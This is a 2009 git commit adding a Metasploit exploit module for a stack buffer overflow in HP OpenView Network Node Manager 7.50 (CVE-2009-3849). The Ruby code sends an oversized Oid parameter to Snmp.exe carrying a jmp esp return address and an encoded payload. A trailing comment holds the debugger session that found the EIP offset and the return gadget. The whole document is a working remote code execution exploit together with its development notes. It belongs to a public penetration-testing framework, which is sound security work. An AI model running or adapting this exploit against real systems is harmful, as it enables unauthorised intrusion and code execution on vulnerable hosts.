added exploit module hp_nnm_snmp.rb

git-svn-id: file:///home/svn/framework3/trunk@7832 4d416f70-5f16-0410-b530-b9f4589650da
2024-11-12 11:52:01 +01:00 · 2009-12-12 20:06:14 +00:00 · 2009-12-12 20:06:14 +00:00 · 002b043d4c
commit 002b043d4c
parent 23a63991b2
1 changed files with 104 additions and 0 deletions
--- a/modules/exploits/windows/http/hp_nnm_snmp.rb
+++ b/modules/exploits/windows/http/hp_nnm_snmp.rb
@ -0,0 +1,104 @@
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack overflow in HP OpenView Network Node Manager 7.50.
+					By sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute
+					arbitrary code.
+			},
+			'Author'         => [ 'MC' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: $',
+			'References'     =>
+				[
+					[ 'CVE', '2009-3849' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'Space'    => 650,
+					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        => 
+				[
+					[ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll 
+				],
+			'DefaultTarget'  => 0,			
+			'DisclosureDate' => 'Dec 9 2009'))
+			
+			register_options( [ Opt::RPORT(80) ], self.class )
+
+	end
+
+	def exploit
+
+		sploit = rand_text_alpha_upper(5123) + [target.ret].pack('V') + payload.encoded
+
+		print_status("Trying target #{target.name}...")
+
+		send_request_cgi({
+			'uri'		=> "/OvCgi/Main/Snmp.exe",
+			'method'	=> "GET",
+			'data'		=> "Host=&Oid=#{sploit}&Community=&Action=&Context=Snmp",
+			}, 3)
+	
+		handler
+
+	end
+
+end
+=begin
+Search for parameter OidSearch for parameter Debug --not found--
+=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5A
+d6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2
+Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak
+9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5A
+o6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2
+As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av
+9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5A
+z6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2
+Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg
+9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5B
+k6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2
+Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br
+9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5B
+v6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2
+....
+Search for parameter Debug --not found--
+(db4.db8): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=7ffdf000 ecx=00000000 edx=000fa500 esi=00000000 edi=00000000
+eip=386f4737 esp=000fcdf4 ebp=6f47366f iopl=0         nv up ei pl zr na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246
+386f4737 ??              ???
+1:014> !load byakugan
+[Byakugan] Successfully loaded!
+1:014> !pattern_offset 9292
+[Byakugan] Control of ebp at offset 5119.
+[Byakugan] Control of eip at offset 5123.
+1:014> s -b 0x5a000000 0x5a06a000 ff e4
+5a01d78d  ff e4 00 00 83 c4 08 85-c0 75 14 68 18 2f 04 5a  .........u.h./.Z
+1:014> u 0x5a01d78d L1
+ov!OVHelpAPI+0x18d:
+5a01d78d ffe4            jmp     esp <- jmp esp for 7.53, will update in a sec.
+=end